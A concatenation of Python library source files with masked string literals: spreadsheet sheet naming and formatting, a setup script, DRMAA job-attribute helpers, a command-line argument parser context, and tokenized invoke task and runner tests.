        elif isinstance(str_or_aslice, tuple) and is_array_type(list(str_or_aslice), str):
            indices = names_to_indices(list(str_or_aslice), self.ref.colnames)
            Column.__delitem__(self, indices)
        else:
            Column.__delitem__(self, str_or_aslice)

    def __setitem__(self, str_or_aslice, c):
        if is_string(type(str_or_aslice)):
            self.ref.set_named_column_at(str_or_aslice, c)
        else:
            Column.__setitem__(self, str_or_aslice, c)

    def __getitem__(self, str_or_aslice):
        if is_string(type(str_or_aslice)):
            return self.ref.named_column_at(str_or_aslice)
        else:
            return Column.__getitem__(self, str_or_aslice)

    def __iadd__(self, other):
        """<STR_LIT>"""
        if isinstance(other, OrderedDict):
            self.ref.extend_columns(other)
        else:
            Column.__iadd__(self, other)
        return self

    def __add__(self, other):
        """<STR_LIT>"""
        self.__iadd__(other)
        return self.ref

    def format(self,
               column_index=None, formatter=None,
               format_specs=None, on_demand=False):
        """<STR_LIT>"""
        def handle_one_formatter(columns, aformatter, on_demand):
            # Mirror of NamedRow.format's helper for columns.
            new_indices = columns
            if len(self.ref.colnames) > 0:
                new_indices = names_to_indices(columns, self.ref.colnames)
            theformatter = ColumnFormatter(new_indices, aformatter)
            if on_demand:
                self.ref.add_formatter(theformatter)
            else:
                self.ref.apply_formatter(theformatter)
        if column_index is not None:
            handle_one_formatter(column_index, formatter, on_demand)
        elif format_specs:
            for spec in format_specs:
                # NOTE(review): identical branches, same suspicion as in
                # NamedRow.format — spec[2] is never used.
                if len(spec) == 3:
                    handle_one_formatter(spec[0], spec[1],
                                         on_demand)
                else:
                    handle_one_formatter(spec[0], spec[1],
                                         on_demand)


# Keyword arguments recognised by sheet construction helpers.
VALID_SHEET_PARAMETERS = ['<STR_LIT>',
                          '<STR_LIT>',
                          '<STR_LIT>',
                          '<STR_LIT>',
                          '<STR_LIT>',
                          '<STR_LIT>']


class NominableSheet(FilterableSheet):
    """<STR_LIT>

    A filterable sheet whose rows and columns can additionally be
    addressed by name instead of index.
    """
    def __init__(self, sheet=None, name=DEFAULT_NAME,
                 name_columns_by_row=-1,
                 name_rows_by_column=-1,
                 colnames=None,
                 rownames=None,
                 transpose_before=False,
                 transpose_after=False):
        """<STR_LIT>

        :param sheet: 2D array of cell values (defaults to empty).
        :param name: sheet name.
        :param name_columns_by_row: row index to promote to column names
            (-1 disables; mutually exclusive with ``colnames``).
        :param name_rows_by_column: column index to promote to row names
            (-1 disables; mutually exclusive with ``rownames``).
        :param colnames: explicit column names.
        :param rownames: explicit row names.
        :param transpose_before: transpose data before naming.
        :param transpose_after: transpose data after naming.
        """
        if sheet is None:
            sheet = []
        FilterableSheet.__init__(self, sheet)
        if transpose_before:
            self.transpose()
        self.name = name
        self._column_names = []
        self._row_names = []
        self.named_row = NamedRow(self)
        self.named_column = NamedColumn(self)
        if name_columns_by_row != -1:
            if colnames:
                raise NotImplementedError(MESSAGE_NOT_IMPLEMENTED_02)
            self.name_columns_by_row(name_columns_by_row)
        else:
            if colnames:
                self._column_names = colnames
        if name_rows_by_column != -1:
            if rownames:
                raise NotImplementedError(MESSAGE_NOT_IMPLEMENTED_02)
            self.name_rows_by_column(name_rows_by_column)
        else:
            if rownames:
                self._row_names = rownames
        if transpose_after:
            self.transpose()

    @property
    def row(self):
        """<STR_LIT>"""
        return self.named_row

    @row.setter
    def row(self, value):
        # Intentionally read-only; assignment is silently ignored.
        pass

    @property
    def column(self):
        """<STR_LIT>"""
        return self.named_column

    @column.setter
    def column(self, value):
        # Intentionally read-only; assignment is silently ignored.
        pass

    def name_columns_by_row(self, row_index):
        """<STR_LIT>

        Promote the row at ``row_index`` to column names and remove it
        from the data body.
        """
        self.row_index = row_index
        self._column_names = make_names_unique(self.row_at(row_index))
        del self.row[row_index]

    def name_rows_by_column(self, column_index):
        """<STR_LIT>

        Promote the column at ``column_index`` to row names and remove
        it from the data body.
        """
        self.column_index = column_index
        self._row_names = make_names_unique(self.column_at(column_index))
        del self.column[column_index]

    @property
    def colnames(self):
        """<STR_LIT>"""
        # With active column filters, hide names of filtered-out columns.
        if len(self._filters) != 0:
            column_filters = [f for f in self._filters
                              if isinstance(f, ColumnIndexFilter)]
            if len(column_filters) != 0:
                indices = range(0, len(self._column_names))
                for f in column_filters:
                    indices = [i for i in indices if i not in f.indices]
                return [self._column_names[i] for i in indices]
            else:
                # NOTE(review): returns the internal list itself, so
                # callers can mutate sheet state — confirm intentional.
                return self._column_names
        else:
            return self._column_names

    @colnames.setter
    def colnames(self, value):
        """<STR_LIT>"""
        self._column_names = make_names_unique(value)

    @property
    def rownames(self):
        """<STR_LIT>"""
        # With active row filters, hide names of filtered-out rows.
        if len(self._filters) != 0:
            row_filters = [f for f in self._filters
                           if isinstance(f, RowIndexFilter)]
            if len(row_filters) != 0:
                indices = range(0, len(self._row_names))
                for f in row_filters:
                    indices = [i for i in indices if i not in f.indices]
                return [self._row_names[i] for i in indices]
            else:
                return self._row_names
        else:
            return self._row_names

    @rownames.setter
    def rownames(self, value):
        """<STR_LIT>"""
        self._row_names = make_names_unique(value)

    def named_column_at(self, name):
        """<STR_LIT>"""
        index = name
        if is_string(type(index)):
            index = self.colnames.index(name)
        column_array = self.column_at(index)
        return column_array

    def set_named_column_at(self, name, column_array):
        """<STR_LIT>"""
        index = name
        if is_string(type(index)):
            index = self.colnames.index(name)
        self.set_column_at(index, column_array)

    def delete_columns(self, column_indices):
        """<STR_LIT>"""
        FilterableSheet.delete_columns(self, column_indices)
        # Keep the name list aligned with the surviving columns.
        if len(self._column_names) > 0:
            new_series = [self._column_names[i]
                          for i in range(0, len(self._column_names))
                          if i not in column_indices]
            self._column_names = new_series

    def delete_rows(self, row_indices):
        """<STR_LIT>"""
        FilterableSheet.delete_rows(self, row_indices)
        # Keep the name list aligned with the surviving rows.
        if len(self._row_names) > 0:
            new_series = [self._row_names[i]
                          for i in range(0, len(self._row_names))
                          if i not in row_indices]
            self._row_names = new_series

    def delete_named_column_at(self, name):
        """<STR_LIT>"""
        if isinstance(name, int):
            # NOTE(review): popping *rownames* while deleting a column
            # looks wrong — presumably colnames was intended; confirm.
            if len(self.rownames) > 0:
                self.rownames.pop(name)
            self.delete_columns([name])
        else:
            index = self.colnames.index(name)
            self.colnames.pop(index)
            FilterableSheet.delete_columns(self, [index])

    def named_row_at(self, name):
        """<STR_LIT>"""
        index = name
        # NOTE(review): unlike named_column_at there is no is_string
        # guard here, so an integer argument is looked up by value in
        # rownames — confirm whether int access was ever intended.
        index = self.rownames.index(name)
        row_array = self.row_at(index)
        return row_array

    def set_named_row_at(self, name, row_array):
        """<STR_LIT>"""
        index = name
        if is_string(type(index)):
            index = self.rownames.index(name)
        self.set_row_at(index, row_array)

    def delete_named_row_at(self, name):
        """<STR_LIT>"""
        if isinstance(name, int):
            if len(self.rownames) > 0:
                self.rownames.pop(name)
            self.delete_rows([name])
        else:
            index = self.rownames.index(name)
            self.rownames.pop(index)
            FilterableSheet.delete_rows(self, [index])

    def apply_formatter(self, aformatter):
        """<STR_LIT>"""
        aformatter = self._translate_named_formatter(aformatter)
        FormattableSheet.apply_formatter(self, aformatter)

    def _translate_named_formatter(self, aformatter):
        # Convert name-based formatter indices to positional ones; other
        # formatter types pass through untouched.
        if isinstance(aformatter, NamedColumnFormatter):
            series = self.colnames
        elif isinstance(aformatter, NamedRowFormatter):
            series = self.rownames
        else:
            series = None
        if series:
            indices = names_to_indices(aformatter.indices, series)
            aformatter.update_index(indices)
        return aformatter

    def add_formatter(self, aformatter):
        """<STR_LIT>"""
        aformatter = self._translate_named_formatter(aformatter)
        FormattableSheet.add_formatter(self, aformatter)

    def extend_rows(self, rows):
        """<STR_LIT>"""
        incoming_data = []
        if isinstance(rows, OrderedDict):
            # Dict keys become new row names, values become the rows.
            keys = rows.keys()
            for k in keys:
                self.rownames.append(k)
                incoming_data.append(rows[k])
            FilterableSheet.extend_rows(self, incoming_data)
        elif len(self.rownames) > 0:
            # A named sheet cannot accept anonymous rows.
            raise TypeError(MESSAGE_DATA_ERROR_ORDEREDDICT_IS_EXPECTED)
        else:
            FilterableSheet.extend_rows(self, rows)

    def extend_columns_with_rows(self, rows):
        """<STR_LIT>"""
        if len(self.colnames) > 0:
            # Pull the header row out of the incoming data first.
            headers = rows.pop(self.row_index)
            self._column_names += headers
        FilterableSheet.extend_columns_with_rows(self, rows)

    def extend_columns(self, columns):
        """<STR_LIT>"""
        incoming_data = []
        if isinstance(columns, OrderedDict):
            keys = columns.keys()
            for k in keys:
                self.colnames.append(k)
                incoming_data.append(columns[k])
            FilterableSheet.extend_columns(self, incoming_data)
        elif len(self.colnames) > 0:
            raise TypeError(MESSAGE_DATA_ERROR_ORDEREDDICT_IS_EXPECTED)
        else:
            FilterableSheet.extend_columns(self, columns)

    def __iter__(self):
        # Column names take precedence over row names when choosing the
        # default iteration scheme.
        if len(self._column_names) > 0:
            return ColumnIndexIterator(self)
        elif len(self._row_names) > 0:
            return RowIndexIterator(self)
        else:
            return FilterableSheet.__iter__(self)

    def to_array(self):
        """<STR_LIT>"""
        from ..utils import to_array
        ret = []
        ret += to_array(self.rows())
        if len(self.rownames) > 0:
            # Prepend each row's name to its cells.
            ret = map(lambda value: [value[0]] + value[1],
                      zip(self.rownames, ret))
            if not PY2:
                # map() is lazy on Python 3; materialise it.
                ret = list(ret)
        if len(self.colnames) > 0:
            if len(self.rownames) > 0:
                # Top-left corner cell placeholder plus the header row.
                ret.insert(0, ["<STR_LIT>"] + self.colnames)
            else:
                ret.insert(0, self.colnames)
        return ret

    def to_records(self, custom_headers=None):
        """<STR_LIT>"""
        from ..utils import to_records
        return to_records(self, custom_headers)

    def to_dict(self, row=False):
        """<STR_LIT>"""
        from ..utils import to_dict
        if row:
            return to_dict(RowIndexIterator(self))
        else:
            return to_dict(ColumnIndexIterator(self))

    def __getitem__(self, aset):
        # Support sheet[row, col] where either coordinate may be a name.
        if isinstance(aset, tuple):
            if isinstance(aset[0], str):
                row = self.rownames.index(aset[0])
            else:
                row = aset[0]
            if isinstance(aset[1], str):
                column = self.colnames.index(aset[1])
            else:
                column = aset[1]
            return self.cell_value(row, column)
        else:
            return Matrix.__getitem__(self, aset)

    def __border__(self):
        # Texttable border characters; the header separator differs when
        # column names are present.
        if len(self.colnames) > 0:
            return ['<STR_LIT:->', '<STR_LIT:|>', '<STR_LIT:+>', '<STR_LIT:=>']
        else:
            return ['<STR_LIT:->', '<STR_LIT:|>', '<STR_LIT:+>', '<STR_LIT:->']

    def __str__(self):
        from ..formatters import to_format
        ret = "<STR_LIT>" % self.name
        if len(self.colnames) > 0:
            table = Texttable(max_width=0)
            table.set_chars(self.__border__())
            data = self.to_array()
            table.set_cols_dtype(['<STR_LIT:t>'] * len(data[0]))
            new_data = []
            for sub_array in data:
                new_array = []
                for item in sub_array:
                    if item == "<STR_LIT>":
                        new_array.append("<STR_LIT:U+0020>")
                    else:
                        new_array.append(to_format(str, item))
                new_data.append(new_array)
            table.add_rows(new_data)
            return ret + table.draw()
        else:
            return ret + FilterableSheet.__str__(self)

    def named_rows(self):
        return NamedRowIterator(self)

    def named_columns(self):
        return NamedColumnIterator(self)
"""<STR_LIT>"""
try:
    from setuptools import setup, find_packages
except ImportError:
    # Bootstrap setuptools when it is not already installed.
    from ez_setup import use_setuptools
    use_setuptools()
    from setuptools import setup, find_packages

setup(
    name='<STR_LIT>',
    author="<STR_LIT>",
    version='<STR_LIT>',
    author_email="<STR_LIT>",
    packages=find_packages(exclude=['<STR_LIT>', '<STR_LIT>', '<STR_LIT>']),
    include_package_data=True,
    # Reuse the module docstring above as the long description.
    long_description=__doc__,
    zip_safe=False,
    classifiers=[
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>',
        '<STR_LIT>'
    ]
)
"""<STR_LIT>"""
from __future__ import absolute_import, print_function, unicode_literals

import sys
from collections import namedtuple
from ctypes import (byref, c_uint, create_string_buffer, POINTER, pointer,
                    sizeof)

from drmaa.const import ATTR_BUFFER, ENCODING, NO_MORE_ELEMENTS
from drmaa.errors import error_buffer
from drmaa.wrappers import (drmaa_attr_names_t, drmaa_attr_values_t,
                            drmaa_get_attribute, drmaa_get_attribute_names,
                            drmaa_get_next_attr_name,
                            drmaa_get_next_attr_value,
                            drmaa_get_next_job_id, drmaa_get_vector_attribute,
                            drmaa_get_vector_attribute_names, drmaa_job_ids_t,
                            drmaa_release_attr_names,
                            drmaa_release_attr_values,
                            drmaa_release_job_ids, drmaa_run_bulk_jobs,
                            drmaa_set_attribute, drmaa_set_vector_attribute,
                            drmaa_version, STRING)

if sys.version_info < (3, 0):
    # Align Python 2 names with Python 3 semantics for this module:
    # bytes -> str, str -> unicode.
    bytes = str
    str = unicode

# Default C string-buffer length for attribute reads.
_BUFLEN = ATTR_BUFFER


class BoolConverter(object):
    """<STR_LIT>

    Maps Python booleans to/from the byte flags the DRMAA C API expects.
    """

    def __init__(self, true=b'<STR_LIT:y>', false=b'<STR_LIT:n>'):
        # Accept text arguments and normalise them to bytes.
        if isinstance(true, str):
            true = true.encode(ENCODING)
        self.true = true
        if isinstance(false, str):
            false = false.encode(ENCODING)
        self.false = false

    def to_drmaa(self, value):
        if value:
            return self.true
        else:
            return self.false

    def from_drmaa(self, value):
        if value == self.true:
            return True
        else:
            return False


class IntConverter(object):
    """<STR_LIT>

    Maps Python ints to/from the byte strings the DRMAA C API expects.
    """
    @staticmethod
    def to_drmaa(value):
        return bytes(value)

    @staticmethod
    def from_drmaa(value):
        return int(value)


class SessionStringAttribute(object):
    # Descriptor reading a session-level string via a DRMAA C getter.

    def __init__(self, drmaa_function):
        self._f = drmaa_function

    def __get__(self, *args):
        buf = create_string_buffer(_BUFLEN)
        c(self._f, buf, sizeof(buf))
        return buf.value.decode()


Version = namedtuple("<STR_LIT>", "<STR_LIT>")
if sys.version_info < (3, 0):
    Version.__str__ = lambda x: "<STR_LIT>".format(x.major,
                                                   x.minor).encode(ENCODING)
else:
    Version.__str__ = lambda x: "<STR_LIT>".format(x.major, x.minor)


class SessionVersionAttribute(object):
    """<STR_LIT>

    Descriptor reading the DRMAA implementation version.
    """
    def __get__(self, *args):
        # Initial values are placeholders; drmaa_version overwrites them.
        major = c_uint(10)
        minor = c_uint(10)
        c(drmaa_version, byref(major), byref(minor))
        return Version(major.value, minor.value)


class Attribute(object):
    """<STR_LIT>

    Descriptor for a scalar job-template attribute, with an optional
    converter between Python values and DRMAA byte strings.
    """

    def __init__(self, name, type_converter=None):
        """<STR_LIT>"""
        if isinstance(name, str):
            name = name.encode(ENCODING)
        self.name = name
        self.converter = type_converter

    def __set__(self, instance, value):
        if self.converter:
            v = self.converter.to_drmaa(value)
        elif isinstance(value, str):
            v = value.encode(ENCODING)
        else:
            v = value
        c(drmaa_set_attribute, instance, self.name, v)

    def __get__(self, instance, _):
        attr_buffer = create_string_buffer(ATTR_BUFFER)
        c(drmaa_get_attribute, instance, self.name, attr_buffer,
          sizeof(attr_buffer))
        if self.converter:
            return self.converter.from_drmaa(attr_buffer.value)
        elif isinstance(attr_buffer.value, bytes):
            return attr_buffer.value.decode()
        else:
            return attr_buffer.value


class VectorAttribute(object):
    """<STR_LIT>

    Descriptor for a list-valued job-template attribute.
    """

    def __init__(self, name):
        if isinstance(name, str):
            name = name.encode(ENCODING)
        self.name = name

    def __set__(self, instance, value):
        c(drmaa_set_vector_attribute, instance,
          self.name, string_vector(value))

    def __get__(self, instance, _):
        return list(vector_attribute_iterator(instance, self.name))


class DictAttribute(object):
    """<STR_LIT>

    Descriptor for a dict-valued attribute, marshalled as a vector of
    formatted key/value strings.
    """

    def __init__(self, name):
        if isinstance(name, str):
            name = name.encode(ENCODING)
        self.name = name

    def __set__(self, instance, value):
        vector = []
        for k, v in value.items():
            if isinstance(k, bytes):
                k = k.decode(ENCODING)
            if isinstance(v, bytes):
                v = v.decode(ENCODING)
            vector.append("<STR_LIT>".format(k, v).encode(ENCODING))
        c(drmaa_set_vector_attribute, instance, self.name,
          string_vector(vector))

    def __get__(self, instance, _):
        # Split each entry on the first separator only, so values may
        # themselves contain the separator character.
        x = [i.split('<STR_LIT:=>', 1) for i in
             list(vector_attribute_iterator(instance, self.name))]
        return dict(x)


def attributes_iterator(attributes):
    # Yield decoded attribute values; the C-side collection is released
    # exactly once, on both the normal and the error path.
    try:
        buf = create_string_buffer(ATTR_BUFFER)
        while drmaa_get_next_attr_value(attributes, buf,
                                        sizeof(buf)) != NO_MORE_ELEMENTS:
            yield buf.value.decode()
    # NOTE(review): bare except also catches GeneratorExit/
    # KeyboardInterrupt; it does re-raise, so cleanup still runs, but a
    # narrower clause would be cleaner.
    except:
        drmaa_release_attr_values(attributes)
        raise
    else:
        drmaa_release_attr_values(attributes)


def adapt_rusage(rusage):
    """<STR_LIT>

    Convert a DRMAA rusage attribute collection into a plain dict.
    """
    rv = dict()
    for attr in attributes_iterator(rusage.contents):
        k, v = attr.split('<STR_LIT:=>', 1)
        rv[k] = v
    return rv


def vector_attribute_iterator(jt, attr_name):
    avalues = pointer(POINTER(drmaa_attr_values_t)())
    c(drmaa_get_vector_attribute, jt, attr_name, avalues)
    return attributes_iterator(avalues.contents)


def attribute_names_iterator():
    # Yield the names of all supported scalar attributes, releasing the
    # C-side name list exactly once.
    attrn_p = pointer(POINTER(drmaa_attr_names_t)())
    c(drmaa_get_attribute_names, attrn_p)
    try:
        name = create_string_buffer(_BUFLEN)
        while drmaa_get_next_attr_name(attrn_p.contents, name,
                                       _BUFLEN) != NO_MORE_ELEMENTS:
            yield name.value.decode()
    except:
        drmaa_release_attr_names(attrn_p.contents)
        raise
    else:
        drmaa_release_attr_names(attrn_p.contents)


def vector_attribute_names_iterator():
    # Same as attribute_names_iterator, but for vector attributes.
    attrn_p = pointer(POINTER(drmaa_attr_names_t)())
    c(drmaa_get_vector_attribute_names, attrn_p)
    try:
        name = create_string_buffer(_BUFLEN)
        while drmaa_get_next_attr_name(attrn_p.contents, name,
                                       _BUFLEN) != NO_MORE_ELEMENTS:
            yield name.value.decode()
    except:
        drmaa_release_attr_names(attrn_p.contents)
        raise
    else:
        drmaa_release_attr_names(attrn_p.contents)


def run_bulk_job(jt, start, end, incr=1):
    # Submit a bulk job array and yield the resulting job id strings.
    jids = pointer(POINTER(drmaa_job_ids_t)())
    try:
        c(drmaa_run_bulk_jobs, jids, jt, start, end, incr)
        jid = create_string_buffer(_BUFLEN)
        while drmaa_get_next_job_id(jids.contents, jid,
                                    _BUFLEN) != NO_MORE_ELEMENTS:
            yield jid.value.decode()
    except:
        drmaa_release_job_ids(jids.contents)
        raise
    else:
        drmaa_release_job_ids(jids.contents)


def c(f, *args):
    """<STR_LIT>

    Call a DRMAA C function, appending the shared error buffer and its
    size to the argument list (as every DRMAA call requires).
    """
    return f(*(args + (error_buffer, sizeof(error_buffer))))


def string_vector(v):
    # Build a NULL-terminated C array of STRING values from a Python
    # sequence, encoding text entries.
    vlen = len(v)
    values = (STRING * (vlen + 1))()
    for i, el in enumerate(v):
        values[i] = STRING(el.encode(ENCODING) if isinstance(el, str) else el)
    values[vlen] = STRING()
    return values


def attribute_setter(obj, attribute_name):
    """<STR_LIT>"""
    def f(value):
        # NOTE(review): this bare string expression is a no-op — it was
        # presumably meant to set f.__doc__; confirm intent.
        "<STR_LIT>" % attribute_name
        c(drmaa_set_attribute, obj, attribute_name, value)
    f.__name__ = '<STR_LIT>' + attribute_name
    return f


def attribute_getter(obj, attribute_name):
    """<STR_LIT>"""
    def f():
        # NOTE(review): no-op string expression, same as attribute_setter.
        "<STR_LIT>" % attribute_name
        attr_buffer = create_string_buffer(<NUM_LIT>)
        c(drmaa_get_attribute, obj, attribute_name, attr_buffer,
          sizeof(attr_buffer))
        return attr_buffer.value
    f.__name__ = '<STR_LIT>' + attribute_name
    return f
import itertools

from ..vendor.lexicon import Lexicon

from .argument import Argument


def translate_underscores(name):
    # Strip leading/trailing underscores and turn interior ones into
    # dashes, CLI-flag style.
    return name.lstrip('<STR_LIT:_>').rstrip('<STR_LIT:_>').replace('<STR_LIT:_>', '<STR_LIT:->')


def to_flag(name):
    # Single-character names get a short-flag prefix, longer names the
    # long-flag prefix.
    name = translate_underscores(name)
    if len(name) == 1:
        return '<STR_LIT:->' + name
    return '<STR_LIT>' + name


def sort_candidate(arg):
    # Pick the name to sort an Argument by: prefer its shortest (single
    # character) names, falling back to the long ones.
    names = arg.names
    shorts = set(x for x in names if len(x.strip('<STR_LIT:->')) == 1)
    longs = set(x for x in names if x not in shorts)
    return sorted(shorts if shorts else longs)[0]


def flag_key(x):
    """<STR_LIT>

    Sort key for flags: long flags before short ones, then
    case-insensitive alphabetical, with a case-inverted copy as the
    final tiebreaker (so lowercase sorts before uppercase).
    """
    ret = []
    x = sort_candidate(x)
    # Long flags (len > 1) get 0 and thus sort first.
    ret.append(1 if len(x) == 1 else 0)
    ret.append(x.lower())
    inversed = '<STR_LIT>'
    for char in x:
        inversed += char.lower() if char.isupper() else char.upper()
    ret.append(inversed)
    return ret


class ParserContext(object):
    """<STR_LIT>

    Holds the arguments (and their flag spellings) for one parsing
    context, e.g. a task or the top-level program.
    """
    def __init__(self, name=None, aliases=(), args=()):
        """<STR_LIT>"""
        self.args = Lexicon()
        self.positional_args = []
        self.flags = Lexicon()
        # Maps e.g. --no-foo -> --foo for default-True boolean flags.
        self.inverse_flags = {}
        self.name = name
        self.aliases = aliases
        for arg in args:
            self.add_arg(arg)

    def __str__(self):
        aliases = "<STR_LIT>"
        if self.aliases:
            aliases = "<STR_LIT>".format('<STR_LIT:U+002CU+0020>'.join(self.aliases))
        name = ("<STR_LIT>".format(self.name, aliases)) if self.name else "<STR_LIT>"
        args = ("<STR_LIT>".format(self.args)) if self.args else "<STR_LIT>"
        return "<STR_LIT>".format(name, args)

    def __repr__(self):
        return str(self)

    def add_arg(self, *args, **kwargs):
        """<STR_LIT>

        Register an Argument (given directly or built from the
        arguments), wiring up all of its name and flag aliases.
        Raises ValueError on a duplicate name.
        """
        if len(args) == 1 and isinstance(args[0], Argument):
            arg = args[0]
        else:
            arg = Argument(*args, **kwargs)
        # Reject collisions with any already-registered name.
        for name in arg.names:
            if name in self.args:
                msg = "<STR_LIT>"
                raise ValueError(msg.format(name))
        main = arg.names[0]
        self.args[main] = arg
        if arg.positional:
            self.positional_args.append(arg)
        self.flags[to_flag(main)] = arg
        for name in arg.nicknames:
            self.args.alias(name, to=main)
            self.flags.alias(to_flag(name), to=to_flag(main))
        if arg.attr_name:
            self.args.alias(arg.attr_name, to=main)
        # Default-True booleans get an inverse (e.g. --no-xxx) flag.
        if arg.kind == bool and arg.default is True:
            inverse_name = to_flag("<STR_LIT>".format(main))
            self.inverse_flags[inverse_name] = to_flag(main)

    @property
    def needs_positional_arg(self):
        # True while any positional argument is still unfilled.
        return any(x.value is None for x in self.positional_args)

    @property
    def as_kwargs(self):
        """<STR_LIT>"""
        ret = {}
        for arg in self.args.values():
            ret[arg.name] = arg.value
        return ret

    def names_for(self, flag):
        return list(set([flag] + self.flags.aliases_of(flag)))

    def help_for(self, flag):
        """<STR_LIT>

        Return a (flag-spellings, help-text) tuple for ``flag``.
        Raises ValueError for unknown flags.
        """
        if flag not in self.flags:
            err = "<STR_LIT>"
            raise ValueError(err.format(flag, self.flags.keys()))
        arg = self.flags[flag]
        # Only string-kind arguments display a value placeholder.
        value = {
            str: '<STR_LIT>',
        }.get(arg.kind)
        full_names = []
        for name in self.names_for(flag):
            if value:
                if len(name.strip('<STR_LIT:->')) == 1:
                    value_ = ("<STR_LIT>".format(value)) if arg.optional else value
                    valuestr = "<STR_LIT>".format(value_)
                else:
                    valuestr = "<STR_LIT>".format(value)
                    if arg.optional:
                        valuestr = "<STR_LIT>".format(valuestr)
            else:
                # Boolean flags: show the inverse spelling if this is a
                # default-True flag, and no value placeholder.
                if name in self.inverse_flags.values():
                    name = "<STR_LIT>".format(name[2:])
                valuestr = "<STR_LIT>"
            full_names.append(name + valuestr)
        namestr = "<STR_LIT:U+002CU+0020>".join(sorted(full_names, key=len))
        helpstr = arg.help or "<STR_LIT>"
        return namestr, helpstr

    def help_tuples(self):
        """<STR_LIT>"""
        return list(map(
            lambda x: self.help_for(to_flag(x.name)),
            sorted(self.flags.values(), key=flag_key)
        ))

    def flag_names(self):
        """<STR_LIT>"""
        flags = sorted(self.flags.values(), key=flag_key)
        names = [self.names_for(to_flag(x.name)) for x in flags]
        names.append(self.inverse_flags.keys())
        return tuple(itertools.chain.from_iterable(names))
<s> from invoke . tasks import task <EOL> @ task ( default = True ) <EOL> def foo ( ) : <EOL> pass <EOL> @ task ( default = True ) <EOL> def biz ( ) : <EOL> pass </s>
<s> import locale <EOL> import os <EOL> import sys <EOL> import types <EOL> from invoke . vendor . six import StringIO , b <EOL> from signal import SIGINT , SIGTERM <EOL> from spec import ( <EOL> Spec , trap , eq_ , skip , ok_ , raises , assert_contains , assert_not_contains <EOL> ) <EOL> from mock import patch , Mock , call <EOL> from invoke import Runner , Local , Context , Config , Failure , ThreadException <EOL> from invoke . platform import WINDOWS <EOL> from _util import mock_subprocess , mock_pty , skip_if_windows <EOL> _ = "<STR_LIT>" <EOL> class _Dummy ( Runner ) : <EOL> """<STR_LIT>""" <EOL> input_sleep = <NUM_LIT:0> <EOL> def start ( self , command , shell , env ) : <EOL> pass <EOL> def read_stdout ( self , num_bytes ) : <EOL> return "<STR_LIT>" <EOL> def read_stderr ( self , num_bytes ) : <EOL> return "<STR_LIT>" <EOL> def write_stdin ( self , data ) : <EOL> pass <EOL> def default_encoding ( self ) : <EOL> return "<STR_LIT>" <EOL> def wait ( self ) : <EOL> pass <EOL> def returncode ( self ) : <EOL> return <NUM_LIT:0> <EOL> def send_interrupt ( self ) : <EOL> pass <EOL> class _KeyboardInterruptingRunner ( _Dummy ) : <EOL> def wait ( self ) : <EOL> raise KeyboardInterrupt <EOL> class OhNoz ( Exception ) : <EOL> pass <EOL> def _expect_encoding ( codecs , encoding ) : <EOL> assert codecs . iterdecode . called <EOL> for c in codecs . iterdecode . call_args_list : <EOL> eq_ ( c [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] , encoding ) <EOL> def _run ( * args , ** kwargs ) : <EOL> klass = kwargs . pop ( '<STR_LIT>' , _Dummy ) <EOL> settings = kwargs . pop ( '<STR_LIT>' , { } ) <EOL> context = Context ( config = Config ( overrides = settings ) ) <EOL> return klass ( context ) . run ( * args , ** kwargs ) <EOL> def _runner ( out = '<STR_LIT>' , err = '<STR_LIT>' , ** kwargs ) : <EOL> klass = kwargs . pop ( '<STR_LIT>' , _Dummy ) <EOL> runner = klass ( Context ( config = Config ( overrides = kwargs ) ) ) <EOL> if '<STR_LIT>' in kwargs : <EOL> runner . 
returncode = Mock ( return_value = kwargs . pop ( '<STR_LIT>' ) ) <EOL> out_file = StringIO ( out ) <EOL> err_file = StringIO ( err ) <EOL> runner . read_stdout = out_file . read <EOL> runner . read_stderr = err_file . read <EOL> return runner <EOL> class Runner_ ( Spec ) : <EOL> def _run ( self , * args , ** kwargs ) : <EOL> return _run ( * args , ** kwargs ) <EOL> def _runner ( self , * args , ** kwargs ) : <EOL> return _runner ( * args , ** kwargs ) <EOL> def _mock_stdin_writer ( self ) : <EOL> """<STR_LIT>""" <EOL> class MockedStdin ( _Dummy ) : <EOL> pass <EOL> MockedStdin . write_stdin = Mock ( ) <EOL> return MockedStdin <EOL> class init : <EOL> "<STR_LIT>" <EOL> def takes_a_context_instance ( self ) : <EOL> c = Context ( ) <EOL> eq_ ( Runner ( c ) . context , c ) <EOL> @ raises ( TypeError ) <EOL> def context_instance_is_required ( self ) : <EOL> Runner ( ) <EOL> class warn : <EOL> def honors_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : True } , exits = <NUM_LIT:1> ) <EOL> runner . run ( _ ) <EOL> def kwarg_beats_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : False } , exits = <NUM_LIT:1> ) <EOL> runner . run ( _ , warn = True ) <EOL> class hide : <EOL> @ trap <EOL> def honors_config ( self ) : <EOL> runner = self . _runner ( out = '<STR_LIT>' , run = { '<STR_LIT>' : True } ) <EOL> r = runner . run ( _ ) <EOL> eq_ ( r . stdout , '<STR_LIT>' ) <EOL> eq_ ( sys . stdout . getvalue ( ) , '<STR_LIT>' ) <EOL> @ trap <EOL> def kwarg_beats_config ( self ) : <EOL> runner = self . _runner ( out = '<STR_LIT>' ) <EOL> r = runner . run ( _ , hide = True ) <EOL> eq_ ( r . stdout , '<STR_LIT>' ) <EOL> eq_ ( sys . stdout . getvalue ( ) , '<STR_LIT>' ) <EOL> class pty : <EOL> def pty_defaults_to_off ( self ) : <EOL> eq_ ( self . _run ( _ ) . pty , False ) <EOL> def honors_config ( self ) : <EOL> runner = self . _runner ( run = { '<STR_LIT>' : True } ) <EOL> eq_ ( runner . run ( _ ) . 
